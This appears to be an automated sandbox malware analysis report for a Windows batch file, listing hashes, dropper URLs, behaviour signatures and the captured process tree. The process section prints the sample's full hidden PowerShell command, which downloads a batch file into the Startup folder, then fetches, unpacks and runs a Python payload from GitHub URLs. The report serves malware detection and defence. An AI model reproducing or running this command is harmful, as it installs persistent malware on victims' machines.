Analysis

  • max time kernel
    119s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    22-11-2024 03:02

General

  • Target
    bf9c2db653827ae40ddb78e9ea5733fbc917cc34247b0931b19ffae49fb31a6c.bat
  • Size
    271KB
  • MD5
    e7c99129a04e08ee965a08b79137b6a3
  • SHA1
    7e7060bd33efe7eeb2d3b9f2b27244dcd3fe709f
  • SHA256
    bf9c2db653827ae40ddb78e9ea5733fbc917cc34247b0931b19ffae49fb31a6c
  • SHA512
    89451efa002d7cd75c17ef4beb72d6d156695e83058e112fd85b354cf6085713b320e246264f728147e23980fbd6a512ac8518a118493bd1496971a9b3302b6f
  • SSDEEP
    1536:R2Vb2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VR:D

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • exe.dropper
    https://github.com/rouki555/lnk/raw/main/ud.bat
  • exe.dropper
    https://github.com/rouki555/dcm/raw/main/Document.zip

Signatures

  • Blocklisted process makes network request (4 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
    Run PowerShell and hide display window.
  • Drops startup file (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (3 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\bf9c2db653827ae40ddb78e9ea5733fbc917cc34247b0931b19ffae49fb31a6c.bat"
    • Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/rouki555/lnk/raw/main/ud.bat', 'C:\Users\Admin\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowSafety.bat');[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/rouki555/dcm/raw/main/Document.zip', 'C:\Users\Public\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim.py; del C:/Users/Public/Document.zip"
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2348

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2348-4-0x000007FEF5E6E000-0x000007FEF5E6F000-memory.dmp
    Filesize: 4KB
  • memory/2348-5-0x000000001B720000-0x000000001BA02000-memory.dmp
    Filesize: 2.9MB
  • memory/2348-6-0x0000000002810000-0x0000000002818000-memory.dmp
    Filesize: 32KB
  • memory/2348-7-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
    Filesize: 9.6MB
  • memory/2348-8-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
    Filesize: 9.6MB
  • memory/2348-9-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
    Filesize: 9.6MB
  • memory/2348-11-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
    Filesize: 9.6MB
  • memory/2348-10-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
    Filesize: 9.6MB
  • memory/2348-12-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
    Filesize: 9.6MB